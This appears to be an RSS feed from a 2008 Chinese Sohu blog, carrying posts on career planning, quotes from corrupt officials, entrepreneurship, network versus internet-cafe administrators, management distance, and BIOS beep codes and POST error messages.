<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="/xsl/rss.xsl" type="text/xsl" media="screen"?>
<!--åå®¢åå«æ¥å¿ï¼æ¯äºèç½ä¸ä¸ç§ä¸ªäººä¹¦ååäººéäº¤æµçå·¥å·ãéè¿åå®¢è®°å½ä¸å·¥ä½ãå­¦ä¹ ãçæ´»åå¨±ä¹çç¹æ»´ï¼çè³è§ç¹åè¯è®ºï¼ä»èå¨ç½ä¸å»ºç«ä¸ä¸ªå®å¨å±äºèªå·±çä¸ªäººå¤©å°ãå»ºç«åå®¢ï¼æå©äºä»äººå¨äºèç½ä¸æ´å¥½å°è®¤è¯æ¨ï¼ä¹æå©äºæ¨æ´å¥½çåå«äººäº¤æµãåå®¢ä¸çæ¯ä¸ä¸ªå¼æ¾åå±äº«çä¸çãæçåå®¢ç±æçå¬å¸å¼åï¼ç®åæ¯åè´¹æå¡ã--> 
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

	<channel>
		<title>忆思雨帘</title>
		<link>http://qune1.blog.sohu.com/</link>
		<description><![CDATA[]]></description>
		<pubDate>Mon, 8 Sep 2008 10:46:54 +0800</pubDate>
		<generator>搜狐博客</generator>
		<image>
			<title>http://blog.sohu.com</title>
			<url>http://js.pp.sohu.com/ppp/blog/images/common/logo_150_60.gif</url>
			<link>http://blog.sohu.com/</link>
			<width>100</width>
			<height>43</height>
			<description>搜狐博客</description>
		</image>
		<item>
			<title>你是&#8220;穷忙&#8221;一族吗？ </title>
			<link>http://qune1.blog.sohu.com/99308728.html</link>
			<comments>http://qune1.blog.sohu.com/99308728.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Mon, 8 Sep 2008 10:46:54 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/99308728.html</guid>
			<description><![CDATA[<font size="3"><strong>什么是穷忙族？</strong> </font>
<p><font size="3">　　职场竞争激烈，忙碌是正常现象。但有的人忙得充实，有的人却忙得很疲惫。为了生存，或只是因为一种惯性，忙，忙，忙&hellip;&hellip;。&ldquo;穷忙族&rdquo;最显著的特点就是每天脚不离地的忙着，甚至超时工作，却不知忙些什么，为什么而忙，看不到效果，也看不到希望。甚至有些人迫于生计，或本身技术含量不高，身兼数职，每天疲于奔命，没有时间充实自己，不但脑力退化速度越来越快，职场竞争力也越来越弱，这样的恶性循环,到头来只能是一场忙碌一场空。 </font></p>
<p><font size="3">　　如今，越来越多的上班族抱怨自己是&ldquo;穷忙族&rdquo;，其中不乏一些月薪近万元的白领。其实不管我们今天拿着高薪还是为生存而忙着，关键看你忙得是否有价值，有希望。无目标的忙，只会导致明天的&ldquo;穷&rdquo;。 </font></p>
<p><font size="3">　　向阳生涯首席职业规划师洪向阳表示，在市场竞争激烈的今天，对于职场新人而言，&ldquo;穷忙&rdquo;是可以理解，并且也是必要的成长过程，但工作3-5年之后仍处于&ldquo;穷忙族&rdquo;，就必须反省是何原因导致的了。 </font></p>
<p><font size="3"><strong>&ldquo;穷忙族&rdquo; 翻身术：职业规划是关键</strong> </font></p>
<p><font size="3">　　&ldquo;穷忙&rdquo;就像个漩涡，陷进去越深越难抽身出来。如何有效脱离&ldquo;穷忙族&rdquo;，翻身做自己的主人？向阳生涯CCDM职业规划师认为，你可以找出很多&ldquo;穷忙&rdquo;的理由，但是否有清晰的职业规划才是其中的关键。具体来说，我们可从以下三个方面来认请这个问题： </font></p>
<p><font size="3">　　<strong>一、 做好职业规划，忙得更有价值 </strong></font></p>
<p><font size="3">　　当我们有了明确的职业规划以及清晰的职业目标时，就会知道我为什么在这里工作，是为了积累经验还是为了提升技能，还是为了历炼些什么。对于一个希望职业有所发展的人来说，明确知道自己所要的，为工作赋予意义，这时候哪怕再忙再累，也会觉得非常有价值。反之，则会觉得在瞎忙，甚至是在受罪。 </font></p>
<p><font size="3">　<strong>　二、 做好职业规划，忙得更有效率</strong> </font></p>
<p><font size="3">　　做好职业规划后，定位就会清晰，目标自会明确。你现在的任务就是如何有效的一步步靠近目标，直至实现。你也会努力寻找如何才能提高工作效率的方法，对于自己来讲，哪些是需要提升的，哪些是需要锻炼的，哪些是自己比较有竞争力的东西，都会一目了然。每一天的忙碌都是直奔目标主题，正确并高效的，减少了因茫目而多走的弯路。有目标的忙不是负担，更是一种动力。 </font></p>
<p><font size="3"><strong>　　三、 做好职业规划，忙得更有效益</strong> </font></p>
<p><font size="3">　　因为对工作的认同，对所从事的职业的认同，所以，我们会更加地投入工作，对工作的主动性也会大大增强。而当我们对工作更加投入的过程中，我们的职业竞争力相应也提升到更高，这时候自然会给企业给社会创造更多的价值更多的财富，而你得到的回报也一定是丰厚的，包括名誉上的、物质上的、精神上的，都会很快来到你身边。 </font></p>
<p><font size="3">　　在现今社会，大家都埋头忙着，有些人也知道自己是在穷忙，甚至知道需要进行职业规划，但应该怎样给自己做职业规划，大部分人却给不出答案。作为专业的职业生涯管理咨询机构，向阳生涯CCDM职业规划师提醒广大职场朋友，如果你还在&ldquo;穷忙&rdquo;，请务必认真想想，你的职业规划是什么？当前的工作是否有利于你职业规划的实现？如果回答是清晰而肯定的，那么恭喜你&mdash;&mdash;这样的付出是值得的；如果回答是否定的，请不要在浪费生命了，立即着手改变！ </font></p>
<p><font size="3">　　洪向阳简介：上海向阳生涯管理咨询有限公司 首席职业规划师、总经理，CCDM中国职业规划师认证培训专家组秘书长。美国APT心理类型协会和APP澳大利亚心理学家出版社MBTI认证施测师。长期从事职业生涯管理与开发的研究、咨询及培训事业，帮助企业及个人获得更大的竞争优势。 </font></p>]]></description>
		</item>
		    
		
		<item>
			<title>&#34;语不惊人死不休&#34; 盘点2008年落马贪官语录</title>
			<link>http://qune1.blog.sohu.com/99096100.html</link>
			<comments>http://qune1.blog.sohu.com/99096100.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Fri, 5 Sep 2008 10:35:28 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/99096100.html</guid>
			<description><![CDATA[<font size="2">&nbsp;&nbsp;&nbsp; 尽管贪官语录一直被人关注，但是，贪官们并没有意识到人们关注其语录的本意。因而，依然屡屡出现贪官&ldquo;语不惊人誓不休&rdquo;的现象。笔者总结一下2008年贪官们&ldquo;发表&rdquo;的语录，希望能够起到一定的警示作用。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其一，&ldquo;面子型&rdquo;：原中铁信息工程集团有限公司审计部部长李昌波认为，他收钱不是受贿，而是&ldquo;我这人脸皮薄，人家一再坚持给，我就不好意思推辞&rdquo;。&ldquo;脸皮薄&rdquo;受贿18万，如果脸皮厚一点，会受贿多少呢？真是好一个不要脸的面子型贪官！<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其二，&ldquo;无可奈何型&rdquo;：原重庆市第三人民医院院长刘松涛，是一个财色双贪的无耻贪官。然而，刘对自己贪色这样解释道：&ldquo;我是有情人&rdquo;，&ldquo;有很多女人喜欢自己，我也没办法&rdquo;。刘松涛是因为有情，很多女人喜欢他吗？其实，刘之所以有&ldquo;女人缘&rdquo;，除了刘能言善辩、喜好这一口外，更重要的还是手中的权力与地位。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其三，&ldquo;表白型&rdquo;：淮南市人防办公室党组原书记、主任陈万华被调查时一边表白自己&ldquo;干干净净做事，清清白白做人&rdquo;，一边对举报人打压，同时还不忘继续收受贿赂，甚至被&ldquo;双规&rdquo;的前三天，还利用休息时间在办公室里加班&ldquo;点钞&rdquo;。他还有神奇之处：在等待终审判决期间，将监狱的教导员拉下水了。贪官边表白，边干腐败，真是无可救药。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其四，&ldquo;糊涂型&rdquo;：大余县下垄钨业有限公司原总经理冯阳，事后这样反问自己：&ldquo;我要那么多钱干什么？&rdquo;贪官如此问，你信吗？不信。因为，贪官并非不知道贪那么多钱用来干什么，而是遏制不了心中的贪欲。此时这样问，显然是装糊涂。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其五，&ldquo;委屈型&rdquo;：黄山市政协原副主席吴洪明在法庭上&ldquo;叫屈&rdquo;，&ldquo;在具体的工作中，很多事情是约定俗成的，只要考虑到对大局有利，对长远发展有利，让局部作些牺牲，都是允许的。&rdquo;更令人叫绝的是，他声称收钱&ldquo;是为了上下级之间搞好关系&rdquo;。滥用职权、违规审批，竟然是&ldquo;约定俗成&rdquo;的，还有没有原则和法纪？真是一派胡言。收钱才能搞好上下级关系？真是混帐之极！<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其六，&ldquo;受害型&rdquo;：渝中区环卫二所原所长范方华原本想捞一把，收受贿赂近30万元。然而，令范没想到的是，竟然被行贿人&ldquo;算计&rdquo;，最终不仅退回贿金，而且还倒贴40万元&ldquo;封口费&rdquo;。因而，当范某被指控收贿时，范叫&ldquo;委屈&rdquo;说，&ldquo;我也是受害者啊！&rdquo;范因此被人戏称为&ldquo;史上最倒霉贪官&rdquo;。收受贿赂，究竟是谁害谁，再清楚不过了。然而，贪官竟然以&ldquo;受害者&rdquo;自称。真是早知如此，何必当初？<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其七，&ldquo;比清廉型&rdquo;：开化县委原书记王金良落马后，有一句记人震惊的台词：&ldquo;收了钱，还觉得自己比别人清廉。&rdquo;贪官够无耻的，腐败了还要比&ldquo;清廉&rdquo;，有这种比法吗？真是&ldquo;前无古人，后无来者&rdquo;的贪官。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其八，&ldquo;口是心非型&rdquo;：&ldquo;我是党一手提拔起来的干部，不可能去干违法犯罪的事情。我一心为公，绝没有半点私心和私利。&rdquo;涪陵区农机局原局长罗姝俐讲这话时信誓旦旦。但检察机关查明，她在任职期间曾大肆贪污、受贿、挪用公款。&ldquo;口是心非&rdquo;的自说岂能瞒过检察官？做白日梦吧。<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其九，&ldquo;法盲型&rdquo;：乐山市市中区水利局原局长曹桂芳改忏悔说，&ldquo;直到以涉嫌贪污罪被逮捕，我才知道贪污是重罪。&rdquo;作为一个领导干部难道真的不知道贪污是重罪？笑话！<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;其十，&ldquo;安全型&rdquo;：陕西省高速集团原董事长陈双全，受贿优先考虑国有企业，因为国企&ldquo;比较安全&rdquo;。一方面，国企工程质量有保证，就不容易暴露背后的经济问题；另一方面，国企有办法做账。贪官的&ldquo;安全观&rdquo;警醒人啊。</font>]]></description>
		</item>
		    
		
		<item>
			<title>你适合创业吗? 创业与就业的七种不同</title>
			<link>http://qune1.blog.sohu.com/98524321.html</link>
			<comments>http://qune1.blog.sohu.com/98524321.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Fri, 29 Aug 2008 10:12:07 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/98524321.html</guid>
			<description><![CDATA[<font size="3">创业是要非常理性地去对待的一件大事，并非人人都适合创业。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;<strong>1.目标和思维高度</strong> <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;作为一个真正意义上的创业者，知道自己最终想要什么，要达到目标需要经过哪些过程，具备长远眼光，拥有战略意识。而作为就业者，着眼点也就是当前这两三年，往往第一考虑是如何保住现有的饭碗，自然不会想到太远。而且，很少有就业者能进行换位思考，站到老板的角度去考虑问题，也就造成很多就业者很难能与创业者沟通。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;<strong>2.完成工作的习惯</strong> <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;创业者对一件工作的完成定义是指把某件事彻底解决，今天能搞定的一定不拖到明天。而就业者会习惯性地把工作按照天数来分解，下班时间一到心里就习惯性地想闪人，剩下的工作明天再做。很多人都抱怨老板苛刻，加班很频繁，其实这是从创业时期就建立起来的习惯，事业就是生命，工作就是生活。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;<strong>3.单个环节与整个系统</strong> <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;就业者接受到一个指派工作任务后，进行处理或是分解后转交给其他同事，然后在他看来，这事就差不多算完了，至于转交出去的工作任务是否被保质保量按时间完成了，那就不是他所要操心的范围之内了。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;长此以往，许多就业者已经习惯只管自己的二亩三分地，转交给别人的事就让别人操心去吧。严重缺少整体系统概念。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;<strong>4.责任</strong> <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;在一个企业或是公司里，我们最常见到的就是在出现事故后，老板要追查责任，大家异常统一、步调一致地互相推卸责任，极少有人会站出来承认自己工作的不足，反而都强调自己肯定是把属于自己那个环节做好了，至于前后衔接人员所出的问题，和我一点关系也没有。其实，创业者们的成长也就是从一个个自己承担的失败中总结分析了问题原因所在，积累了经验。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;<strong>5.个人意识与联合力量</strong> <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;很多的就业者脑海中都存在着个人英雄主义，总希望在一些事情上表露一下，在上司面前表表功，为了不被其他同事分摊去一些功劳，所以有时候就会冒着一定的风险一个人单枪匹马干点什么出来，当然，要是出了漏子，最后还得是公司承担，很少有就业者会从降低成本及风险或是提高效率的角度出来，去主动联合其他同事，共同完成某项任务，这个个人英雄主义有时候是要害死人的。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;<strong>6.成本概念</strong> <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;作为创业者，每一分钱的支出都会算作是成本，省下来的就是利润，所以，精打细算是许多老板的习惯性思维和动作，这是从创业过程中养成的习惯，绝对不是一个&quot;抠&quot;字能概括得了的。而就业们却是大方得很，以至于许多就业者在自己创业的时候，还改变不了在就业时养成的大手大脚的习惯。 <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;<strong>7.办事一条线</strong> <br /><br />&nbsp;&nbsp;&nbsp;&nbsp;条条大路通罗马，完成工作一定不止一种方法，但就业者长期工作生涯下来，已经习惯了用单一思维去考虑问题，A事就用A类解决办法，B事就用B类解决办法，很少会去用超越性的思维从多角度多方向来考虑问题的解决思路。</font>]]></description>
		</item>
		    
		
		<item>
			<title>网络管理员与网吧管理员区别</title>
			<link>http://qune1.blog.sohu.com/98359076.html</link>
			<comments>http://qune1.blog.sohu.com/98359076.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Wed, 27 Aug 2008 12:43:40 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/98359076.html</guid>
			<description><![CDATA[<span><font><font size="2">随着人类的不断进步，涌现出了许多新的行业和职务，特别是网络技术的飞速发展，出现了两种类似的职务，分别是网络管理员和网吧管理员，然而正是一字的差别，以至于很多从对这两个名称产生了误解，普遍认为网络管理员就是网吧管理员。其实这是两个完全不同的概念，产生误淆的主要原因就是对各个行业了解不够，我认为这种理解是片面性的。<!--NEWSZW_HZH_BEGIN--> </font>
<p><font size="2">网络管理员的工作主要是确实网络正常运行的负责人，也是整个网络的技术负责人，是一个典型的复合性人才，主要是针对一些大、中、小型企业的网络管理工作，加快企业信息化建设，减少企业资金投入和提高办事工作效率要精通网络技术、计算机技术等，其工作主要包含三个方面：网络建设、网络维护和网络服务。但是其主要任务还是对整个网络的管理，使其能正常提供服务，因此网络设备的管理是网管工作中重点中的重点。要管理网络设备，就必须知道网络在物理上是如何连接起来的，网络中的终端如何与另一终端实现互访与通信，如何处理速率与带宽的差别；同的网络是如何对联及如何通信的。要解决这些问题，就要首先了解局域网，了解路由器、交换机、网关等设备。其实是对服务器的管理，服务器是一种特殊的计算机，它是网络中为端计算机提供各种服务的高性能的计算机，它在网络操作系统的控制下，将与其相连的硬盘、磁带、打印机、MODEM及的专用通讯设备提供给网络上的客户站点共享，也能为网络用户提供集中计算、信息发表及数据管理等服务。主要提供以下服务：WEB服务器、E-MAIL服务器、FTP服务器、DNS 服务器、PROXY(代理服务)器、数据库服务器等。这就需要网络管理员对所有的服务都应该所有所了解，在有需求的时候，能够熟练的架设服务器并对日后使用中进行维护。最后资源的管理和用户权限的管理，因为网络中的资源很多，如IP地址资源域名资源、磁盘资源等，只有管理好这些资源才能够让网络为用户提供更好的服务。而网吧管理员，所做的工作就比较简单了，据本人了解及去网吧工作后才发现，其实网吧管理员做的事情真的很简单，特别是一些小规模的网吧，网吧业主为了保证利润的最大化，一般只有招几名服务员和一两名网吧管理员，虽然名义上有区别，但是实际操作过程中网吧管理员就是服务生，不论是计算机软硬件故障和网络故障还是不属于网吧管理员管辖的一些服务，只要客户一声令下，必将有应必答，难怪网上会有人说网吧管理员就是帮人抹屁股的，另外随着计算机的逐渐普及和信息技术的不断发展，每个人的家里都有电脑，企业也都有自己的网络，从这方面看来，两者所处的社会地位还是有着本质区别的，依我看来，网吧这个行业会慢慢的淡出市场，从而倒至网吧管理员这一行业从社会上消息，而随着企业信息化的不断进入，每个企业都会引入网络管理员来构建自己的专有网吧，因此市场上对网络管理员的需求量还是很大的，因此要正确理解这两者的区别，不但要深化认识观念，更需要通过广大网络管理员的努力，不断提高这个职务的社会认可度，真正在实际中发挥应有的作用，为打造一个&ldquo;高效率、超稳定&rdquo;的网络做出自己的贡献。<br /></font></p></font></span>]]></description>
		</item>
		    
		
		<item>
			<title>管理者与下属的刺猬理论</title>
			<link>http://qune1.blog.sohu.com/98274674.html</link>
			<comments>http://qune1.blog.sohu.com/98274674.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Tue, 26 Aug 2008 13:57:00 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/98274674.html</guid>
			<description><![CDATA[<font size="2">&nbsp;&nbsp;&nbsp; 在冷风瑟瑟的冬日里，有两只困倦的刺猬想要相拥取暖休息。但无奈的是双方的身上都有刺，刺的双方无论怎么调整睡姿也睡的不安稳。于是，它们就分开了一定的距离。但又冷的受不了，于是又凑到了一起。几经反复的折腾，两只刺猬终于通过自己的努力找到了一个合适的距离，又能互相取暖，又不至于刺到对方，于是舒服的睡了。这个故事不禁让我们想到了管理实践中管理者与被管理者之间的距离应该是多远呢？无疑，刺猬理论给了我们最贴切的答案。 </font>
<p><font size="2">　　心理学家研究表明，领导者要想搞好工作，应该与下属保持较为亲密的关系，这样容易赢得下属的尊重，下属在工作时也愿意从领导的角度出发，替领导考虑，并尽可能的把事情做好。但同时又要保持适当的距离，尤其在心理距离上。这样可以保持领导的神秘感，而且减少下属或下属与下属之间的胡乱猜疑，避免不必要的争斗。但有以下几种情形还要区别对待。 </font></p>
<p><font size="2">　　<strong>1、当你只有一个下属的时候</strong> </font></p>
<p><font size="2">　　在很多中小型企业的人力资源部、企化部等部门的人员往往都很少。大多数都是一个经理带着一个&ldquo;兵&rdquo;。在这个时候往往两者之间的距离很亲近，有种共生或相依为命的感觉。这时的管理通常很简单，不必使用过分复杂的管理技巧和手段。多数时候只要经理吩咐，下属就会照做，但在绩效上的效果通常不会很好，但还可以完成。 </font></p>
<p><font size="2">　　因为员工和经理的距离很近，经理通常布置工作后不好意思催促或监督下属工作，即使有时不痛不痒的说了几句，也因为关系亲密被忽略了。所以在这种条件下的管理最应该注意心理距离的问题，在工作中不应经常带有日常的感情，并不要交流过多关于个人的隐私问题，虽然这对增进感情很有好处，但由于过分亲近又没有竞争的压力，如果在加上管理不当，会造成工作拖延、懈怠，绩效低下等不良现象。 </font></p>
<p><font size="2">　<strong>　2、当你有几个下属的时候</strong> </font></p>
<p><font size="2">　　情况通常会很复杂，假如你的下属是和你一个办公室，也就是说和你在一起办公时。这时，你的下属通常会分为几个不同势力的小圈子。圈子的中心就是在你面前的红人。当然也可能出现最不好管理的几个人围成一个小阵营。这个时候领导最重要的工作是平衡自己与各个阵营的关系和距离，而不是只局限于与各人的关系中。 </font></p>
<p><font size="2">　　通常要注意的就是日常工作的安排是否合理、绩效考核是否公平和每个红人之间距离的问题。但无特殊情况下，领导者要尽力保持各个阵营的势力均衡，避免某些阵营势力过大，造成管理的不便。同时又由于大家日常在一起工作，领导也要注意和下属沟通的亲密程度以及次数，但正式的沟通或工作安排则不必要回避。以免引起误会或不必要的猜想。 </font></p>
<p><font size="2">　　假如你的下属不经常和你在一起，比如管理销售人员，这就又要复杂一些。这时实际上你对员工的工作情况和思想情况掌握的并不会很多。他们对你感情和距离也难以捉摸。经常会有很大变化，但基本会保持尊敬。他们会因为你无意和他们的闲聊，距离突然拉近。也会因为一次销售的失败，对你、对公司同时失去信心。昨天还兄弟天长地久，今日就离你而去。 </font></p>
<p><font size="2">　　所以这种情况，管理者最重要的就是在可以保持规范化管理的前提下和下属保持比较近的心理距离，把握下属的心理，才能合理的使用管理模式，取得较好的管理绩效。 </font></p>
<p><font size="2">　　<strong>3、当你的下属有几十个人以上时</strong> </font></p>
<p><font size="2">　　这时的管理者多数是在扮演你所在职位应该扮演的角色，而不是做你自己了。这时领导者做的很多工作都要注意自身形象和地位的维护。与员工的距离也要保持适当，甚至可以略远一些，这样更有利于自己权威的体现。但在工作之余可以和员工走的近些，尽量平易近人，这样员工在工作中会表现的比较尊敬和畏惧。但切不可距离很近，这样很容易暴露个人的缺点，影响下属对领导的敬佩，甚至造成失望。 </font></p>
<p><font size="2">　　其实管理无定论，领导与员工的关系也如镜中花、水中月，也会因为管理者的性别和其他因素有近有远。但刺猬理论却给我们提了一个很有意义的提示，无论远近，舒适、温暖就好。</font></p>]]></description>
		</item>
		    
		
		<item>
			<title>BIOS</title>
			<link>http://qune1.blog.sohu.com/97624697.html</link>
			<comments>http://qune1.blog.sohu.com/97624697.html#comment</comments>
			<dc:creator>忆思雨帘</dc:creator>
			<pubDate>Tue, 19 Aug 2008 14:51:38 +0800</pubDate>
			<guid>http://qune1.blog.sohu.com/97624697.html</guid>
			<description><![CDATA[<p><font size="3">BB是报警的声音<br />你可以根据报警声音长短,数目来判断问题出在什么地方<br />AWARD BIOS响铃声的一般含义是：<br />1短: 系统正常启动。这是我们每天都能听到的，也表明机器没有任何问题。 <br />2短: 常规错误，请进入CMOS Setup，重新设置不正确的选项。 <br />1长1短: RAM或主板出错。换一条内存试试，若还是不行，只好更换主板。 <br />1长2短: 显示器或显示卡错误。 <br />1长3短: 键盘控制器错误。检查主板。 <br />1长9短: 主板Flash RAM或EPROM错误，BIOS损坏。换块Flash RAM试试。 <br />不断地响（长声）: 内存条未插紧或损坏。重插内存条，若还是不行，只有更换一条内存。 <br />不停地响: 电源、显示器未和显示卡连接好。检查一下所有的插头。 <br />重复短响: 电源问题。 <br />无声音无显示: 电源问题。</font></p>
<p><br /><font size="3">AMI BIOS响铃声的一般含义是：<br />　　1. 一短声，内存刷新失败。内存损坏比较严重，恐怕非得更换内存不可。<br />　　2. 二短声，内存奇偶校验错误。可以进入CMOS设置，将内存Parity奇偶校验选项关掉，即设置为Disabled。不过一般来说，内存条有奇偶校验并且在CMOS设置中打开奇偶校验，这对微机系统的稳定性是有好处的。<br />　　3. 三短声，系统基本内存（第1个64Kb）检查失败。更换内存吧。<br />　　4. 四短声，系统时钟出错。维修或更换主板。<br />　　5. 五短声，CPU错误。但未必全是CPU本身的错，也可能是CPU插座或其它什么地方有问题，如果此CPU在其它主板上正常，则肯定错误在于主板。<br />　　6. 六短声，键盘控制器错误。如果是键盘没插上，那好办，插上就行；如果键盘连接正常但有错误提示，则不妨换一个好的键盘试试；否则就是键盘控制芯片或相关的部位有问题了。<br />　　7. 七短声，系统实模式错误，不能切换到保护模式。这也属于主板的错。<br />　　8. 八短声，显存读/写错误。显卡上的存贮芯片可能有损坏的。如果存贮片是可插拔的，只要找出坏片并更换就行，否则显卡需要维修或更换。<br />　　9. 九短声，ROM BIOS检验出错。换块同类型的好BIOS试试，如果证明BIOS有问题，你可以采用重写甚至热插拔的方法试图恢复。<br />　　10. 十短声，寄存器读/写错误。只能是维修或更换主板。<br />　　11. 十一短声，高速缓存错误。<br />　　12. 如果听不到beep响铃声也看不到屏幕显示，首先应该检查一下电源是否接好，在检修时往往容易疏忽，不接上主板电源就开机测试。其次得看看是不是少插了什么部件，如CPU、内存条等。再次，拔掉所有的有疑问的插卡，只留显示卡试试。最后找到主板上清除（clear）CMOS设置的跳线，清除CMOS设置，让BIOS回到出厂时状态。如果显示器或显示卡以及连线都没有问题，CPU和内存也没有问题，经过以上这些步骤后，微机在开机时还是没有显示或响铃声，那就只能是主板的问题了。</font></p>
<p><br /><font size="3">POENIX的BIOS报警声（以前的老板上有许多POENIX的，可现在已经被AWARD收购了） <br />1短 系统启动正常 <br />1短1短1短 系统加电初始化失败 <br />1短1短2短 主板错误 <br />1短1短3短 CMOS或电池失效 <br />1短1短4短 ROM BIOS校验错误 <br />1短2短1短 系统时钟错误 <br />1短2短2短 DMA初始化失败 <br />1短2短3短 DMA页寄存器错误 <br />1短3短1短 RAM刷新错误 <br />1短3短2短 基本内存错误 <br />1短3短3短 基本内存错误 <br />1短4短1短 基本内存地址线错误 <br />1短4短2短 基本内存校验错误 <br />1短4短3短 EISA时序器错误 <br />1短4短4短 EISA NMI口错误 <br />2短1短1短 前64K基本内存错误 <br />3短1短1短 DMA寄存器错误 <br />3短1短2短 主DMA寄存器错误 <br />3短1短3短 主中断处理寄存器错误 <br />3短1短4短 从中断处理寄存器错误 <br />3短2短4短 键盘控制器错误 <br />3短1短3短 主中断处理寄存器错误 <br />3短4短2短 显示错误 <br />3短4短3短 时钟错误 <br />4短2短2短 关机错误 <br />4短2短3短 A20门错误 <br />4短2短4短 保护模式中断错误 <br />4短3短1短 内存错误 <br />4短3短3短 时钟2错误 <br />4短3短4短 时钟错误 <br />4短4短1短 串行口错误 <br />4短4短2短 并行口错误 <br />4短4短3短 数字协处理器错误</font></p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3"></font>&nbsp;</p>
<p><font size="3">开机BIOS语言</font></p>
<p><font size="3">开机自检时出现问题后会出现各种各样的英文短句，短句中包含了非常重要的信息，读懂这些信息可以自己解决一些小问题，可是这些英文难倒了一部分朋友，下面是一些常见的BIOS短句的解释，大家可以参考一下。 </font></p>
<p><br /><font size="3">1.CMOS battery failed </font></p>
<p><font size="3">中文：CMOS电池失效。 </font></p>
<p><font size="3">解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。 </font></p>
<p><br /><font size="3">2.CMOS check sum error－Defaults loaded </font></p>
<p><font size="3">中文：CMOS 执行全部检查时发现错误，要载入系统预设值。 </font></p>
<p><font size="3">解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没有解决，那么说明CMOS RAM可能有问题，如果没过一年就到经销商处换一块主板，过了一年就让经销商送回生产厂家修一下吧！ </font></p>
<p><br /><font size="3">3.Press ESC to skip memory test </font></p>
<p><font size="3">中文：正在进行内存检查，可按ESC键跳过。 </font></p>
<p><font size="3">解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机就会执行四次内存测试，当然你也可以按 ESC 键结束内存检查，不过每次都要这样太麻烦了，你可以进入COMS设置后选择BIOS FEATURS SETUP，将其中的Quick Power On Self Test设为Enabled，储存后重新启动即可。 </font></p>
<p><br /><font size="3">4.Keyboard error or no keyboard present </font></p>
<p><font size="3">中文：键盘错误或者未接键盘。 </font></p>
<p><font size="3">解释：检查一下键盘的连线是否松动或者损坏。 </font></p>
<p><br /><font size="3">5.Hard disk install failure </font></p>
<p><font size="3">中文：硬盘安装失败。 </font></p>
<p><font size="3">解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如果一样，只要将两个硬盘的跳线设置的不一样即可（一个设为Master，另一个设为Slave）。 </font></p>
<p><br /><font size="3">6.Secondary slave hard fail </font></p>
<p><font size="3">中文：检测从盘失败 </font></p>
<p><font size="3">解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误，这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。 </font></p>
<p><br /><font size="3">7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40) </font></p>
<p><font size="3">中文：无法驱动软盘驱动器。 </font></p>
<p><font size="3">解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了，好在软驱还不贵。 </font></p>
<p><br /><font size="3">8.Hard disk(s) diagnosis fail </font></p>
<p><font size="3">中文：执行硬盘诊断时发生错误。 </font></p>
<p><font size="3">解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试一试，如果问题还是没有解决，只能去修一下了。 </font></p>
<p><br /><font size="3">9.Memory test fail </font></p>
<p><font size="3">中文：内存检测失败。 </font></p>
<p><font size="3">解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼容,去换一条吧！ </font></p>
<p><br /><font size="3">10.Override enable－Defaults loaded </font></p>
<p><font size="3">中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统。 </font></p>
<p><font size="3">解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOAD SETUP DEFAULTS载入系统原来的设定值然后重新启动即可。 </font></p>
<p><br /><font size="3">11.Press TAB to show POST screen </font></p>
<p><font size="3">中文：按TAB键可以切换屏幕显示。 </font></p>
